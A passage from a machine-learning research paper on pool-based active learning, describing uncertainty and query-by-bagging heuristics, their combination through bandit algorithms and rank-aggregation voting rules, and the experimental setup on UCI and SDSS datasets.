$h : \mathcal{X} \to P(\mathcal{Y})$

in other words, we require that the classifier produces class probability estimates for each unlabeled example. for instance, in logistic regression with only two classes, i.e., $\mathcal{Y} = \{0, 1\}$, we can model the probability that an object with feature vector $x$ belongs to the positive class with

$h(x; \theta) = p(y = 1 \mid x; \theta) = \dfrac{1}{1 + e^{-\theta^T x}}$

and the optimal weight vector $\theta$ is learned in training.
we can further consider kernel logistic regression, where the feature space $\mathcal{X}$ is the feature space corresponding to a given kernel, allowing for non-linear decision functions.

in active learning, we use the class probability estimates from a trained classifier to estimate a score of informativeness for each unlabeled example. in pool-based active learning, where we select an object from a pool of unlabeled examples at each time step, we require that some objects have already been labeled. in practice this normally means that we label a small random sample at the beginning. these become the labeled training set $\mathcal{L}_T \subseteq \mathcal{X} \times \mathcal{Y}$, and the rest form the unlabeled set $\mathcal{U} \subseteq \mathcal{X}$.

now consider the problem of choosing the next example in $\mathcal{U}$ for querying. labeling can be a very expensive task, because it requires using expensive equipment or human experts to manually examine each object. thus, we want to be smart in choosing the next example. this motivates us to come up with a rule $s(x; h)$ that gives each unlabeled example a score based only on its feature vector $x$ and the current classifier $h$. recall that the classifier produces $P(\mathcal{Y})$, a probability estimate for each class. we use these probability estimates over the unlabeled examples to calculate the scores:

$s : P(\mathcal{Y}) \to \mathbb{R}$

the value of $s(x; h)$ indicates the informativeness of example $x$, where bigger is better. we would then label the example with the largest value of $s(x; h)$. this gives our active learning rule $r$:

$r(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} s(x; h)$

algorithm 1 outlines the standard pool-based active learning setting. coming up with an optimal rule is itself a difficult problem, but there have been many attempts to derive good heuristics. five common ones, which we use in our experiments, are described in "uncertainty sampling" and "version space reduction."

algorithm 1: the pool-based active learning algorithm.
input: unlabeled set $\mathcal{U}$, labeled training set $\mathcal{L}_T$, classifier $h(x)$, and active learner $r(\mathcal{U}, h)$.
repeat
  select the most informative candidate $x^*$ from $\mathcal{U}$ using the active learning rule $r(\mathcal{U}, h)$.
  ask the expert to label $x^*$. call the label $y^*$.
  add the newly labeled example to the training set: $\mathcal{L}_T \leftarrow \mathcal{L}_T \cup \{(x^*, y^*)\}$.
  remove the newly labeled example from the unlabeled set: $\mathcal{U} \leftarrow \mathcal{U} \setminus \{x^*\}$.
  retrain the classifier $h(x)$ using $\mathcal{L}_T$.
until we have enough training examples.

there are also heuristics that involve minimizing the variance or maximizing the classifier certainty of the model (schein & ungar), but they are computationally expensive. for example, in the variance-minimization heuristic, the score of a candidate example is the expected reduction in the model variance if that example were in the training set. to compute this reduction, we first need to give the example each of the possible labels, add it to the training set, and update the classifier. this is expensive since in each iteration the classifier needs to be retrained $k \cdot u$ times, where $k$ is the number of classes and $u$ is the size of the unlabeled pool. there are techniques to speed this up, such as using online training or assigning a score to only a small subset of the unlabeled pool. preliminary experiments showed that these heuristics do not perform as well as the simpler ones (tran), so we do not consider them in this paper. a more comprehensive treatment of these active learning heuristics can be found in settles.
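the pool-based loop of algorithm 1 can be sketched with scikit-learn as follows. this is a minimal sketch assuming a least-confidence score; the synthetic data, the simulated oracle, and the labeling budget are placeholders we introduce for illustration.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

def least_confidence_scores(proba):
    """s(x; h) = -max_y p(y|x; h): higher means the classifier is less confident."""
    return -proba.max(axis=1)

rng = np.random.default_rng(0)
X_pool = rng.normal(size=(500, 5))                            # unlabeled pool (placeholder)
true_labels = (X_pool[:, 0] + X_pool[:, 1] > 0).astype(int)   # stands in for the human oracle

# seed the training set with a few examples from each class
pos = np.where(true_labels == 1)[0][:5]
neg = np.where(true_labels == 0)[0][:5]
labelled = list(np.concatenate([pos, neg]))
unlabelled = [i for i in range(len(X_pool)) if i not in labelled]

clf = LogisticRegression()
while len(labelled) < 60:                                     # placeholder labeling budget
    clf.fit(X_pool[labelled], true_labels[labelled])
    proba = clf.predict_proba(X_pool[unlabelled])
    best = unlabelled[int(np.argmax(least_confidence_scores(proba)))]
    labelled.append(best)                                     # "ask the expert" for the label
    unlabelled.remove(best)
```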
uncertainty sampling

lewis & gale introduced uncertainty sampling, where we select the instance whose class membership the classifier is least certain about. these tend to be points near the decision boundary of the classifier. perhaps the simplest way to quantify uncertainty is the least confidence heuristic (culotta & mccallum), where we pick the candidate whose most likely label the classifier is most uncertain about:

$r_{LC}(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} \left( -\max_{y \in \mathcal{Y}} p(y \mid x; h) \right)$

where $p(y \mid x; h)$ is the probability that the object with feature vector $x$ belongs to class $y$ under classifier $h$. for consistency, we have flipped the sign of the score function so that the candidate with the highest score is picked.

a second option is to calculate the entropy (shannon), which measures the amount of information needed to encode a distribution. intuitively, the closer the class probabilities of an object are to a uniform distribution, the higher its entropy. this gives us the heuristic of picking the candidate with the highest entropy of the distribution over the classes:

$r_{HE}(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} \left( -\sum_{y \in \mathcal{Y}} p(y \mid x; h) \log\left[p(y \mid x; h)\right] \right)$

as a third option we can pick the candidate with the smallest margin, defined as the difference between the two highest class probabilities (scheffer, decomain & wrobel):

$r_{SM}(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} \left( -\left( \max_{y \in \mathcal{Y}} p(y \mid x; h) - \max_{z \in \mathcal{Y} \setminus \{y^*\}} p(z \mid x; h) \right) \right)$

where $y^* = \arg\max_{y \in \mathcal{Y}} p(y \mid x; h)$ and we again flip the sign of the score function. since the sum of all probabilities must be 1, the smaller the margin is, the harder it is to differentiate between the two most likely labels.

an extension to the above three heuristics is to weight the score with the information density, so that we give more importance to instances in regions of high density:

$s_{ID}(x; h) = \left( \dfrac{1}{u} \sum_{k=1}^{u} \mathrm{sim}(x, x^{(k)}) \right) s(x; h)$

where $h$ is the classifier, $s(x; h)$ is the original score function of the instance with feature vector $x$, $u$ is the size of the unlabeled pool, and $\mathrm{sim}(x, x^{(k)})$ is the similarity between $x$ and another instance $x^{(k)}$ using the gaussian kernel with parameter $\gamma$:

$\mathrm{sim}(x, x^{(k)}) = \exp\left(-\gamma \lVert x - x^{(k)} \rVert^2\right)$

the information density weighting was proposed by settles & craven to discourage the active learner from picking outliers. although the class membership of outliers might be uncertain, knowing their labels would probably not affect the classifier performance on the data as a whole.

version space reduction

instead of focusing on the uncertainty of individual predictions, we could try to constrain the size of the version space, thus allowing the search for the optimal classifier to be more precise. the version space is defined as the set of all possible classifiers that are consistent with the current training set. to quantify the size of this space, we can train a committee of $B$ classifiers, $\mathcal{B} = \{h_1, h_2, \ldots, h_B\}$, and measure the disagreement among the members of the committee about an object's class membership. ideally, each member should be as different from the others as possible but still be in the version space (melville & mooney). in order to have this diversity, we give each member only a subset of the training examples. since there might not be enough training data, we use bootstrapping and select samples with replacement; hence this method is often called query by bagging (qbb).
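before turning to the committee-based disagreement measures, the three uncertainty scores and the information-density weight above can be sketched directly from a matrix of predicted class probabilities. the probability values in the example below are placeholders.

```python
import numpy as np

def confidence_score(proba):
    # least confidence: negative of the most probable class probability
    return -proba.max(axis=1)

def entropy_score(proba, eps=1e-12):
    # highest entropy of the predicted class distribution
    return -np.sum(proba * np.log(proba + eps), axis=1)

def margin_score(proba):
    # smallest margin: negative difference between the two largest probabilities
    part = np.sort(proba, axis=1)
    return -(part[:, -1] - part[:, -2])

def information_density(X, gamma):
    # average gaussian similarity of each candidate to the rest of the pool
    sq_dists = ((X[:, None, :] - X[None, :, :]) ** 2).sum(axis=-1)
    return np.exp(-gamma * sq_dists).mean(axis=1)

# proba: (u, k) matrix of predicted class probabilities over the unlabeled pool;
# the density-weighted variants simply multiply any of these scores by the density term
proba = np.array([[0.60, 0.30, 0.10],
                  [0.34, 0.33, 0.33],
                  [0.90, 0.05, 0.05]])
print(confidence_score(proba), entropy_score(proba), margin_score(proba))
```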
one way to measure the level of disagreement is to calculate the margin using the class probabilities estimated by the committee (melville & mooney):

$r_{QBBM}(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} \left( -\left( \max_{y \in \mathcal{Y}} p(y \mid x; \mathcal{B}) - \max_{z \in \mathcal{Y} \setminus \{y^*\}} p(z \mid x; \mathcal{B}) \right) \right)$

where

$y^* = \arg\max_{y \in \mathcal{Y}} p(y \mid x; \mathcal{B})$

$p(y \mid x; \mathcal{B}) = \dfrac{1}{B} \sum_{b=1}^{B} p(y \mid x; h_b)$

this looks similar to one of the uncertainty sampling heuristics, except that we now use $p(y \mid x; \mathcal{B})$ instead of $p(y \mid x; h)$; that is, we first average the class probabilities predicted by the members before minimizing the margin.

mccallum & nigam offered an alternative disagreement measure, which involves picking the candidate with the largest mean kullback-leibler (kl) divergence from the average:

$r_{QBBKL}(\mathcal{U}, h) = \arg\max_{x \in \mathcal{U}} \dfrac{1}{B} \sum_{b=1}^{B} D_{KL}(p_b \parallel p_{\mathcal{B}})$

where $D_{KL}(p_b \parallel p_{\mathcal{B}})$ is the kl divergence from $p_{\mathcal{B}}$ (the probability distribution averaged across the committee $\mathcal{B}$) to $p_b$ (the distribution predicted by a member $b \in \mathcal{B}$):

$D_{KL}(p_b \parallel p_{\mathcal{B}}) = \sum_{y \in \mathcal{Y}} p(y \mid x; h_b) \ln \dfrac{p(y \mid x; h_b)}{p(y \mid x; \mathcal{B})}$

for convenience, we summarize the five heuristics discussed above in the table below.

table: summary of active learning heuristics used in our experiments.
confidence (least confidence): $\arg\max_{x \in \mathcal{U}} \left( -\max_{y} p(y \mid x; h) \right)$
entropy (highest entropy): $\arg\max_{x \in \mathcal{U}} \left( -\sum_{y} p(y \mid x; h) \log\left[p(y \mid x; h)\right] \right)$
margin (smallest margin): $\arg\max_{x \in \mathcal{U}} \left( -\left( \max_{y} p(y \mid x; h) - \max_{z \neq y^*} p(z \mid x; h) \right) \right)$
qbb-margin (smallest qbb margin): $\arg\max_{x \in \mathcal{U}} \left( -\left( \max_{y} p(y \mid x; \mathcal{B}) - \max_{z \neq y^*} p(z \mid x; \mathcal{B}) \right) \right)$
qbb-kl (largest qbb kl divergence): $\arg\max_{x \in \mathcal{U}} \frac{1}{B} \sum_{b=1}^{B} D_{KL}(p_b \parallel p_{\mathcal{B}})$
note: $p(y \mid x; h)$ is the probability that an object with feature vector $x$ has label $y$ under classifier $h$; $\mathcal{B}$ is the set of $B$ classifiers $\{h_1, \ldots, h_B\}$; $\mathcal{Y}$ is the set of possible labels; $y^*$ is the most certain label; $\mathcal{U}$ is the set of unlabeled instances; $D_{KL}(p \parallel q)$ is the kullback-leibler divergence of $p$ from $q$; and $p_{\mathcal{B}}$ is the class distribution averaged across classifiers in $\mathcal{B}$. for consistency with heuristics that use minimization, we flip the sign of the score so that we can always take the argmax to get the best candidate.
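a sketch of the two committee-based scores, computed from the class probabilities predicted by the committee members, is shown below; the committee outputs used in the example are placeholders.

```python
import numpy as np

def qbb_margin_score(probas):
    """probas: (B, u, k) class probabilities from B bootstrap-trained members."""
    avg = probas.mean(axis=0)                    # consensus distribution p_B
    part = np.sort(avg, axis=1)
    return -(part[:, -1] - part[:, -2])          # smallest margin of the averaged distribution

def qbb_kl_score(probas, eps=1e-12):
    avg = probas.mean(axis=0)
    kl = np.sum(probas * np.log((probas + eps) / (avg[None] + eps)), axis=2)
    return kl.mean(axis=0)                       # mean kl divergence of members from consensus

# three committee members, two candidates, two classes (placeholder numbers)
probas = np.array([[[0.7, 0.3], [0.5, 0.5]],
                   [[0.6, 0.4], [0.9, 0.1]],
                   [[0.8, 0.2], [0.2, 0.8]]])
print(qbb_margin_score(probas), qbb_kl_score(probas))
```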
combining suggestions

out of the five heuristics discussed, which one should we use in practice when we would like to apply active learning to a particular problem? there have been some attempts in the literature to analyze their performance theoretically. proofs are, however, scarce, and when one is available it normally only holds under restrictive assumptions. for example, freund et al. showed that the query by committee algorithm (a slight variant of our two qbb heuristics) guarantees an exponential decrease in the prediction error with the training size, but only when there is no noise. in general, whether any of these heuristics is guaranteed to beat passive learning is still an open question.

even though we do not know which one is best, we can still combine suggestions from all of the heuristics. this can be thought of as the problem of prediction with expert advice, where each expert is an active learning heuristic. in this paper we explore two different approaches: we can either consider the advice of only one expert at each time step (with bandit algorithms), or we can aggregate the advice of all the experts (with social choice theory).

combining suggestions with bandit theory

first let us turn our attention to the multi-armed bandit problem in probability theory (berry & fristedt). the colorful name originates from the situation where a gambler stands in front of a slot machine with $R$ levers. when pulled, each lever gives out a reward according to some unknown distribution. the goal of the game is to come up with a strategy that maximizes the gambler's lifetime rewards. in the context of active learning, each lever is a heuristic with a different ability to identify the candidate whose labeling information is most valuable.

the main problem in multi-armed bandits is the trade-off between exploring random heuristics and exploiting the best heuristic so far. there are many situations in which we find our previously held beliefs to be completely wrong: by always exploiting, we could miss out on the best heuristic, while if we explore too much, it could take a long time to reach the desired accuracy.

bandit algorithms do not need to know the internal workings of the heuristics, only the reward received from using any of them. at each time step, we receive a reward from a heuristic, and based on the history of all the rewards, the bandit algorithm decides which heuristic to pick next. formally, we need to learn the function

$b : \left( \mathcal{J}_{\mathcal{R}} \times [0, 1] \right)^N \to \mathcal{J}_{\mathcal{R}}$

where $b$ is the bandit algorithm, the reward is normalized between 0 and 1, $\mathcal{J}_{\mathcal{R}}$ is the index set over the set of heuristics $\mathcal{R}$, and $N$ is the time horizon.

what would be an appropriate reward $w$ in this setting? we propose using the incremental increase in the performance on the test set after the candidate is added to the training set. this, of course, means that we need to keep a separate labeled test set around, just for the purpose of computing the rewards. we could, as is common practice in machine learning, use cross-validation or bootstrap on $\mathcal{L}_T$ to estimate the generalization performance, but for simplicity of presentation we use a separate test set $\mathcal{L}_S$. the figure below and algorithm 2 outline how bandits can be used in pool-based active learning. the only difference between the bandit algorithms lies in the select function that chooses which heuristic to use, and the update function that updates the algorithm's selection parameters when receiving a new reward.

figure: active learning pipeline with bandit algorithms. rewards $w$ are collected from the test set $\mathcal{L}_S$ in order to decide which heuristic to choose at each time step. notations: $\mathcal{R}$ is the set of heuristics $\{r_1, \ldots, r_R\}$, $\mathcal{L}_T$ is the training set, $\mathcal{L}_S$ is the test set, $\mathcal{U}$ is the unlabeled set, and $P(\mathcal{Y})$ is the predicted class probabilities on the unlabeled data.

there have been some attempts to combine active learning suggestions in the literature. baram, el-yaniv & luz used the exp4 multi-armed bandit algorithm to automate the selection process.
they proposed a reward called the classification entropy maximization, which can be shown to grow at a similar rate to the true accuracy in binary classification with support vector machines (svms). we will not compare our results directly with those of baram, el-yaniv & luz, since we would like to evaluate algorithms that can work with both binary and multi-class classification; our experiments also use logistic regression, which produces probability estimates directly, rather than svms, which can only produce unnormalized scores. hsu & lin studied an improved version of exp4, called exp4.p, and used importance weighting to estimate the true classifier performance using only the training set. in this paper, we empirically compare the following four bandit algorithms: thompson sampling, oc-ucb, kl-ucb, and exp3++.

thompson sampling

the oldest bandit algorithm is thompson sampling (thompson), which solves the exploration-exploitation trade-off from a bayesian perspective. let $w_i$ be the reward of heuristic $r_i \in \mathcal{R}$. observe that even with the best heuristic, we still might not score perfectly due to having a poor classifier trained on finite data. conversely, a bad heuristic might pick an informative candidate due to pure luck. thus there is always a certain level of randomness in the reward received. let us treat the reward $w_i$ as a normally distributed random variable with mean $\nu_i$ and variance $\tau_i^2$:

$(w_i \mid \nu_i) \sim \mathcal{N}(\nu_i, \tau_i^2)$

if we knew both $\nu_i$ and $\tau_i$ for all heuristics, the problem would become trivially easy, since we would just always use the heuristic with the highest mean reward. in practice, we do not know the true mean of the reward $\nu_i$, so let us add a second layer of randomness and assume that the mean itself follows a normal distribution:

$\nu_i \sim \mathcal{N}(m_i, s_i^2)$

to make the problem tractable, let us assume that the variance $\tau_i^2$ in the first layer is a known constant. the goal now is to find a good algorithm that can estimate $m_i$ and $s_i^2$. we start with a prior on $m_i$ and $s_i^2$ for each heuristic $r_i$. the choice of prior does not usually matter in the long run. since initially we do not have any information about the performance of each heuristic, the appropriate prior value for $m_i$ is 0, i.e., there is no evidence (yet) that any of the heuristics offers an improvement to the performance.

algorithm 2: pool-based active learning with bandit theory. note that in addition to the set of active learning heuristics $\mathcal{R}$ and the test set $\mathcal{L}_S$, some bandit algorithms also need to know $N$, the maximum size of the training set, in advance.
input: unlabeled set $\mathcal{U}$, labeled training set $\mathcal{L}_T$, labeled test set $\mathcal{L}_S$, classifier $h$, desired training size $N$, set of active learning heuristics $\mathcal{R}$, and bandit algorithm $b$ with two functions select and update.
while $|\mathcal{L}_T| < N$ do
  select a heuristic $r^* \in \mathcal{R}$ according to select.
  select the most informative candidate $x^*$ from $\mathcal{U}$ using the chosen heuristic $r^*(\mathcal{U}, h)$.
  ask the expert to label $x^*$. call the label $y^*$.
  add the newly labeled example to the training set: $\mathcal{L}_T \leftarrow \mathcal{L}_T \cup \{(x^*, y^*)\}$.
  remove the newly labeled example from the unlabeled set: $\mathcal{U} \leftarrow \mathcal{U} \setminus \{x^*\}$.
  retrain the classifier $h(x)$ using $\mathcal{L}_T$.
  run the updated classifier on the test set $\mathcal{L}_S$ to compute the increase in performance $w$.
  update the parameters of $b$ with update($w$).
end
in each round, we draw a random sample $\nu_i'$ from the normal distribution $\mathcal{N}(m_i, s_i^2)$ for each $i$ and select the heuristic $r^*$ that has the highest sampled value of the mean reward:

$r^* = \arg\max_i \nu_i'$

we then use this heuristic to select the object that is deemed to be the most informative, add it to the training set, and retrain the classifier. next we use the updated classifier to predict the labels of objects in the test set. let $w$ be the reward observed. we now have a new piece of information that we can use to update our prior belief about the mean $m_*$ and the variance $s_*^2$ of the mean reward. using bayes' theorem, we can show that the posterior distribution of the mean reward remains normal,

$(\nu_* \mid w_* = w) \sim \mathcal{N}(m_*', s_*'^2)$

with the following new mean and variance:

$m_*' = \dfrac{m_* \tau_*^2 + w s_*^2}{s_*^2 + \tau_*^2}, \qquad s_*'^2 = \dfrac{s_*^2 \tau_*^2}{s_*^2 + \tau_*^2}$

algorithm 3 summarizes the select and update functions used in thompson sampling.

algorithm 3: thompson sampling with normally distributed rewards. notations: $\mathcal{R}$ is the set of $R$ heuristics, $m$ is the mean parameter of the average reward, $s^2$ is the variance parameter of the average reward, $\tau^2$ is the known variance parameter of the reward, and $w$ is the actual reward received.
function select()
  for $i \in \{1, 2, \ldots, R\}$ do
    $\nu_i' \leftarrow$ draw a sample from $\mathcal{N}(m_i, s_i^2)$
  end
  select the heuristic with the highest sampled value: $r^* \leftarrow \arg\max_i \nu_i'$
function update($w$)
  $m_* \leftarrow \dfrac{m_* \tau_*^2 + w s_*^2}{s_*^2 + \tau_*^2}$
  $s_*^2 \leftarrow \dfrac{s_*^2 \tau_*^2}{s_*^2 + \tau_*^2}$
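a minimal sketch of the thompson sampling select and update steps in algorithm 3 is shown below. the prior values and the known reward variance are placeholders, not the settings tuned later in the paper.

```python
import numpy as np

class ThompsonSampler:
    """thompson sampling over R heuristics with normal rewards of known variance tau2."""
    def __init__(self, n_arms, m0=0.0, s2_0=1.0, tau2=0.05):
        self.m = np.full(n_arms, m0)       # prior mean of the average reward
        self.s2 = np.full(n_arms, s2_0)    # prior variance of the average reward
        self.tau2 = tau2                   # assumed known reward variance

    def select(self):
        samples = np.random.normal(self.m, np.sqrt(self.s2))
        return int(np.argmax(samples))

    def update(self, arm, reward):
        m, s2, t2 = self.m[arm], self.s2[arm], self.tau2
        self.m[arm] = (m * t2 + reward * s2) / (s2 + t2)
        self.s2[arm] = (s2 * t2) / (s2 + t2)

ts = ThompsonSampler(n_arms=6)
arm = ts.select()
ts.update(arm, reward=0.01)   # e.g., the observed increase in test-set mpba
```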
upper confidence bounds

next we consider the upper confidence bound (ucb) algorithms, which use the principle of "optimism in the face of uncertainty." in choosing which heuristic to use, we first estimate the upper bound of the reward (that is, we make an optimistic guess) and pick the one with the highest bound. if our guess turns out to be wrong, the upper bound of the chosen heuristic will decrease, making it less likely to get selected in the next iteration. there are many different algorithms in the ucb family, e.g., ucb1-tuned and ucb2 (auer, cesa-bianchi & fischer), ucb-v (audibert, munos & szepesvári), oc-ucb (lattimore), and kl-ucb (cappé et al.). they differ only in the way the upper bound is calculated; in this paper, we only consider the last two.

in optimally confident ucb (oc-ucb), lattimore suggests that we pick the heuristic that maximizes the following upper bound:

$r^* = \arg\max_i \left( \bar{w}_i + \sqrt{\dfrac{\alpha}{T_i(t)} \ln\left(\dfrac{\psi n}{t}\right)} \right)$

where $\bar{w}_i$ is the average of the rewards from $r_i$ observed so far, $t$ is the time step, $T_i(t)$ is the number of times we have selected heuristic $r_i$ before step $t$, and $n$ is the maximum number of steps that we are going to take. there are two tunable parameters, $\alpha$ and $\psi$, for which the author suggests fixed default values.

in kl-ucb, cappé et al. suggest that we can instead consider the kl-divergence between the distribution of the current estimated reward and that of the upper bound. in the case of normally distributed rewards with known variance $\sigma^2$, the chosen heuristic would be

$r^* = \arg\max_i \left( \bar{w}_i + \sqrt{\dfrac{2\sigma^2 \ln t}{T_i(t)}} \right)$

algorithms 4 and 5 summarize these two ucb approaches. note that the size of the reward $w$ is not used in update($w$) of ucb, except to select the best arm.

algorithm 4: optimally confident ucb. notations: $n$ is the time horizon (maximum number of time steps), $t$ is the current time step, $T_i(t)$ counts how many times heuristic $i$ has been selected before step $t$, $w$ is the reward received, and $\bar{w}_i$ is the average of the rewards from $r_i$ so far.
function select()
  $r^* \leftarrow \arg\max_i \left( \bar{w}_i + \sqrt{\dfrac{\alpha}{T_i(t)} \ln\left(\dfrac{\psi n}{t}\right)} \right)$
function update($w$)
  $t \leftarrow t + 1$
  $T_*(t) \leftarrow T_*(t - 1) + 1$

algorithm 5: kl-ucb with normally distributed rewards. notations: $\sigma^2$ is the variance of the rewards, $t$ is the current time step, $T_i(t)$ counts how many times heuristic $i$ has been selected before step $t$, $w$ is the reward received, and $\bar{w}_i$ is the average of the rewards from $r_i$ so far.
function select()
  $r^* \leftarrow \arg\max_i \left( \bar{w}_i + \sqrt{\dfrac{2\sigma^2 \ln t}{T_i(t)}} \right)$
function update($w$)
  $t \leftarrow t + 1$
  $T_*(t) \leftarrow T_*(t - 1) + 1$
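the select rules of algorithms 4 and 5 can be sketched as follows. the constants for oc-ucb and the reward variance for kl-ucb are our own placeholder choices rather than the values used in the experiments, and the counts and average rewards in the example are also placeholders.

```python
import numpy as np

def ocucb_select(means, counts, t, horizon, alpha=3.0, psi=2.0):
    """optimally confident ucb: means and counts are per-heuristic statistics."""
    bonus = np.sqrt(alpha / counts * np.log(psi * horizon / t))
    return int(np.argmax(means + bonus))

def klucb_gauss_select(means, counts, t, sigma2=0.25):
    """kl-ucb for normally distributed rewards with known variance sigma2."""
    bonus = np.sqrt(2.0 * sigma2 * np.log(t) / counts)
    return int(np.argmax(means + bonus))

means = np.array([0.010, 0.012, 0.008])   # average observed reward per heuristic
counts = np.array([5, 4, 6])              # how often each heuristic has been chosen
print(ocucb_select(means, counts, t=15, horizon=200),
      klucb_gauss_select(means, counts, t=15))
```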
it has the nice property that everyone (or in our context, every active learning heuristic) has a voice. for each heuristic, we assign a score to every candidate with the score function s(x, h) like before. we are neither interested in the actual raw scores nor the candidate with the highest score. instead, we only need a ranking of the candidates, which is achieved by a function kðs;uÞ that provides a ranking of the unlabeled examples according to their scores. for example, k could assign the candidate with the highest score a rank of , the next best candidate a rank of , and so on. an aggregation function c will then combine all the rankings into a combined ranking, c : sðjuÞr ! sðjuÞ ( ) where sðjuÞ is a permutation over the index set of the unlabeled pool u and r is the number of heuristics. from these we can pick the highest-ranked candidate to annotate. see table for an example. the main difference between this approach and the bandit algorithms is that we do not consider the reward history when combining the rankings. here each heuristic is assumed to always have an equal weight. a possible extension, which is not considered in this paper, is to use the past performance to re-weight the heuristics before aggregating at each step. figure and algorithm provide an overview of how social choice theory is used in pool-based active learning. the central question in social choice theory is how we can come up with a good preference aggregation rule. we shall examine three aggregation rules: borda count, the geometric mean, and the schulze method. in the simplest approach, borda count, we assign an integer point to each candidate. the lowest-ranked candidate receives a point of , and each candidate receives one more point than the candidate below. to aggregate, we simply add up all the points each table an example of how to convert raw scores into a ranking. score s(x; h) . . . . rank k(s, u) train with classifier h assign scores with s ,.., sr convert to rankings with k aggregate rankings with cselect highest ranked candidate add to training pool label candidate lt u p(y) σ (ju ), ..., σr(ju ) σ(ju )x∗(x∗, y∗) r figure active learning pipeline with rank aggregation methods. unlike the bandit pipeline, there is only one cycle in which we aggregate information from all heuristics. additional notation: sðjuÞ is a permutation (i.e., rank) on the index set of the unlabeled data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ candidate receives from every heuristic. the candidate with the most points is declared the winner and is to be labeled next. we can think of borda count, then, as ranking the candidate according to the arithmetic mean. an alternative approach is to use the geometric mean, where instead of adding up the points, we multiply them. bedö & ong ( ) showed that the geometric mean maximizes the spearman correlation between the ranks. note that this method requires the ranks to be scaled so that they lie strictly between and . this can be achieved by simply dividing the ranks by (u + ), where u is the number of candidates. the third approach we consider is the schulze method (schulze, ). out of the three methods considered, this is the only one that fulfills the condorcet criterion, i.e., the winner chosen by the algorithm is also the winner when compared individually with each of the other candidates. 
however, the schulze method is more computationally intensive since it requires examining all pairs of candidates. first we compute the number of heuristics that prefer candidate xi to candidate xj, for all possible pairs (xi, xj). let us call this d(xi, xj). let us also define a path from candidate xi to xj as the sequence of candidates, {xi, x , x , ..., xj}, that starts with xi and ends with xj, where, as we move along the path, the number of heuristics that prefer the current candidate over the next candidate must be strictly decreasing. intuitively, the path is the rank of a subset of candidates, where xi is the highest-ranked candidate and xj is at the lowest-ranked. associated with each path is a strength p, which is the minimum of d(xi, xj) for all consecutive xi and xj along the path. the core part of the algorithm involves finding the path of the maximal strength from each candidate to every other. let us call p(xi, xj) the strength of strongest path between xi and xj. candidate xi is a potential winner if pðxi; xjÞ pðxj; xiÞ for all other xj. this problem has a similar flavor to the problem of finding the shortest path. in fact, the implementation uses a variant of the floyd–warshall algorithm to find the strongest path. this is the most efficient implementation that we know of, taking cubic time in the number of candidates. algorithm pool-based active learning with social choice theory. input: unlabeled set u, labeled training set ℒt, classifier h, set of active learning suggestions r, ranking function k, and rank aggregator c. repeat: for r ∈ r do rank all the candidates in u with k. end aggregate all the rankings into one ranking using the aggregator c. select the highest-ranked candidate x� from u. ask the expert to label x�. call the label y�. add the newly labeled example to the training set: lt lt [fðx�; y�Þg. remove the newly labeled example from the unlabeled set: u unfx�g. retrain the classifier h(x) using ℒt. until we have enough training examples. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we end this section with a small illustration of how the three aggregation algorithms work in table . experimental protocol we use classification datasets taken from the uci machine learning repository (https://archive.ics.uci.edu/ml/) (lichman, ), with a large multiclass classification dataset which we extracted from the sdss project (doi . /zenodo. ) (alam et al., ). the code for the experiments can be found on our github repository (https://github.com/chengsoonong/mclass-sky). table shows the size and the number of classes in each dataset, along with the proportion of the samples belonging to the majority class and the maximum achievable performance using logistic regression. these datasets were chosen such that we have an equal number of binary and multiclass datasets, and a mixture of small and large datasets. for each dataset, we use scikit-learn (pedregosa et al., ) to train a logistic regression model using a -fold stratified shuffled cross-validation. here “stratified” means that the proportion of the classes remains constant in each split. we standardize all features to have zero mean and unit variance. although all examples have already been labeled, table an example of how social choice theory algorithms rank candidates by aggregating three heuristics: r , r , and r . there are four candidates in the unlabeled pool: a, b, c, and d. 
experimental protocol

we use classification datasets taken from the uci machine learning repository (https://archive.ics.uci.edu/ml/) (lichman), together with a large multiclass classification dataset which we extracted from the sdss project and archived on zenodo (alam et al.). the code for the experiments can be found on our github repository (https://github.com/chengsoonong/mclass-sky). the table below shows the size and the number of classes in each dataset, along with the proportion of samples belonging to the majority class and the maximum achievable performance using logistic regression. these datasets were chosen so that we have an equal number of binary and multiclass datasets, and a mixture of small and large datasets.

table: overview of datasets, listing for each dataset its size, number of classes, number of features, majority-class proportion, and maximum achievable performance (mpba): glass, ionosphere, iris, magic, miniboone, pageblock, pima, sdss, sonar, vehicle, wine, and wpbc. note: the glass, ionosphere, iris, magic, miniboone, pageblock, pima, sonar, vehicle, wine, and wpbc datasets are from the uci machine learning repository; in particular, the vehicle dataset comes from the turing institute, glasgow, scotland. the sdss dataset was extracted from a data release of sdss-iii.

for each dataset, we use scikit-learn (pedregosa et al.) to train a logistic regression model using stratified shuffled cross-validation. here "stratified" means that the proportion of the classes remains constant in each split. we standardize all features to have zero mean and unit variance. although all examples have already been labeled, we simulate the active learning task by assuming that certain examples do not have any labels. for each fold, the unlabeled pool is a fixed fraction of the data up to a maximum pool size, and the test pool consists of the remaining examples, also up to a maximum size; we assume all test examples are labeled. we initialize the classifier by labeling a small number of random instances and using them as the initial training set. the heuristics are fast enough that we can assign a score to every unlabeled instance at every time step.

we use logistic regression with a gaussian kernel approximation and an l2 regularizer. in the binary case, the loss function is

$L = \theta^T \theta + C \sum_{i=1}^{n} \ln\left(1 + \exp\left(-y_i\, \theta^T f(x_i)\right)\right)$

where $x_i$ is the feature vector of the $i$th example, $y_i \in \{-1, 1\}$ is the label of $x_i$, and $n$ is the training size. the term $\theta^T \theta$ is the regularization term, ensuring that the weight vector $\theta$ does not become too large, and $C$ is a regularization hyperparameter which we find using grid search. to speed up training while using the gaussian kernel, we approximate the feature map of the kernel with random kitchen sinks (rahimi & recht), transforming the raw features $x_i$ into a fixed-dimensional feature vector $f(x_i)$. in the multiclass case, we use the one-vs-rest strategy, where for every class we build a binary classifier that determines whether a particular example belongs to that class or not.

for the qbb algorithms, we train a committee of seven classifiers, where each member is given a bootstrap sample, up to a maximum size, of the examples that have already been labeled. for the bandit algorithms, we use the increase in the mpba on the test set as the reward.
